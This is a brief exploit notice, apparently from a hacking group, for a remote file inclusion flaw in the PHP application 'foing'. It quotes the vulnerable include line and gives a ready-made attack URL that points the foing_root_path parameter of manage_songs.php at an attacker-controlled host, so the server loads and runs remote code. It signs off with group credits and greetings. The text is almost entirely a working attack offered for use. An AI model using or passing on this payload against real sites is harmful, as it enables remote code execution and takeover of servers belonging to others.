Vulnerable code :
include($foing_root_path . 'includes/common.php');
http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker
by Darkfire and IR4DEX GROUP Greetz: Smurf_RedHat :: V0lks